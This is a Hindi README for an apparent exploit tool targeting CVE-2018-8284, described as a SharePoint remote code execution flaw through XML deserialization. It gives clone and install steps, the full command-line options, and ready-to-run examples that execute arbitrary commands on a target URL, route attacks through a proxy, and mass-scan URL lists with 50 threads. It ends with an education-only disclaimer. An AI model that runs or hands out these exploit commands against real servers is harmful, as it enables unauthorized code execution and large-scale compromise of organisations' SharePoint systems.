
CVE-2018-8284 SharePoint RCE एक ऐसा एक्सप्लॉइट है जो Microsoft SharePoint में पाए गए एक कमज़ोरी का फायदा उठाता है। यह कमज़ोरी SharePoint में XML deserialization के कारण उत्पन्न होती है, जो एक remote attacker को विशेष रूप से निर्मित अनुरोध भेजकर मनमाना कोड निष्पादित करने की अनुमति देती है।
git clone https://github.com/GlennPegden2/cve-2018-8284-Sharepoint-RCE.git
cd cve-2018-8284-Sharepoint-RCE
pip install -r requirements.txt
python3 CVE-2018-8284.py --help
usage: CVE-2018-8284.py [-h] [-u URL] [-c COMMAND] [-p PROXY] [-s SCAN] [-t THREADS]
CVE-2018-8284 SharePoint RCE एक्सप्लॉइट
options:
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-u URL, --url URL लक्ष्य SharePoint URL (उदाहरण: http://target.com)
-c COMMAND, --command COMMAND
निष्पादित करने के लिए कमांड
-p PROXY, --proxy PROXY
प्रॉक्सी URL (वैकल्पिक)
-s SCAN, --scan SCAN scan करने के लिए URL फ़ाइल
-t THREADS, --threads THREADS
थ्रेड की संख्या (डिफ़ॉल्ट: 10)
एक एकल लक्ष्य के खिलाफ एक्सप्लॉइट:
python3 CVE-2018-8284.py -u http://target.com -c "whoami"
प्रॉक्सी के साथ एक्सप्लॉइट:
python3 CVE-2018-8284.py -u http://target.com -c "whoami" -p http://127.0.0.1:8080
URLs की सूची स्कैन करना:
python3 CVE-2018-8284.py -s urls.txt -t 50
यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए है। किसी भी अनधिकृत उपयोग के लिए लेखक ज़िम्मेदार नहीं है। केवल उन प्रणालियों के खिलाफ उपयोग करें जिनके आप स्वामी हैं या जिन्हें परीक्षण करने की स्पष्ट अनुमति है।